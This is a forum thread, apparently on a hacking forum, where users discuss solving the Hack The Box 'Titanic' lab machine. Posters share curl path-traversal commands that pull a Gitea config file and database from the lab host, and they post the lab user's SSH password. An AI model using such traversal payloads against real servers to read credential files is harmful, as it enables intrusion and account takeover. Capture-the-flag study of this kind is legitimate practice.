Titanic Hack the Box Season 7 (Linux Easy)
by RedBlock - Saturday February 15, 2025 at 02:59 PM
#11
curl 'http://titanic.htb/download?ticket=../../../../../home/developer/gitea/data/gitea/conf/app.ini'
this is big!

(02-15-2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

do you know how to crack gitea hashes?
Reply
#12
ssh creds for developer
developer : 25282528
Hack the Box Season 8

https://t.me/+u1sCX38Xneo3OGM1
Reply
#13
(02-15-2025, 07:41 PM)Saidakbarxon Wrote:
(02-15-2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

When there is nothing

there is a file
Reply
#14
Got `curl 'http://titanic.htb/download?ticket=../../../../../home/developer/gitea/data/gitea/conf/app.ini'` this is big!
Reply
#15
(02-15-2025, 07:43 PM)LostGem Wrote: ssh creds for developer
developer : 25282528

how did you get that?
did you use the LFI?
Reply
#16
(02-15-2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

How did you find the gitea directory? I know why it's developer, but not why gitea
Reply
#17
https://gist.github.com/h4rithd/0c5da36a...71cf14e271
Reply
#18
(02-15-2025, 07:44 PM)smwhck Wrote:
(02-15-2025, 07:41 PM)Saidakbarxon Wrote:
(02-15-2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

When there is nothing

there is a file
I don't think you'll find anything useful in the file.

(02-15-2025, 07:44 PM)smwhck Wrote:
(02-15-2025, 07:41 PM)Saidakbarxon Wrote:
(02-15-2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

When there is nothing

there is a file
I don't think you'll find anything useful in the file.
Ban reason: Leeching | http://raiddfzn73ir6iyxlf7nwytnujiflddog...an-Appeals if you feel this is incorrect. (Permanent)
Reply
#19
(02-15-2025, 07:53 PM)Saidakbarxon Wrote:
(02-15-2025, 07:44 PM)smwhck Wrote:
(02-15-2025, 07:41 PM)Saidakbarxon Wrote:
(02-15-2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

When there is nothing

there is a file
I don't think you'll find anything useful in the file.

(02-15-2025, 07:44 PM)smwhck Wrote:
(02-15-2025, 07:41 PM)Saidakbarxon Wrote:
(02-15-2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db

When there is nothing

there is a file
I don't think you'll find anything useful in the file.

there's developer password in it!
Reply
#20
(02-15-2025, 07:51 PM)kyakeiuwu Wrote: https://gist.github.com/h4rithd/0c5da36a...71cf14e271

Thank you, that was very helpful
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 22 2,459 Yesterday, 02:15 PM
Last Post: hashxyz
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 769 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ARTIFICIAL.HTB - EASY LINUX chain 0 439 02-10-2026, 02:12 PM
Last Post: chain
  HTB - CONVERSOR.HTB - EASY LINUX chain 0 270 02-09-2026, 04:36 PM
Last Post: chain
  HTB - FACTS.HTB - EASY LINUX chain 2 316 02-09-2026, 11:02 AM
Last Post: chain



 Users browsing this thread: 1 Guest(s)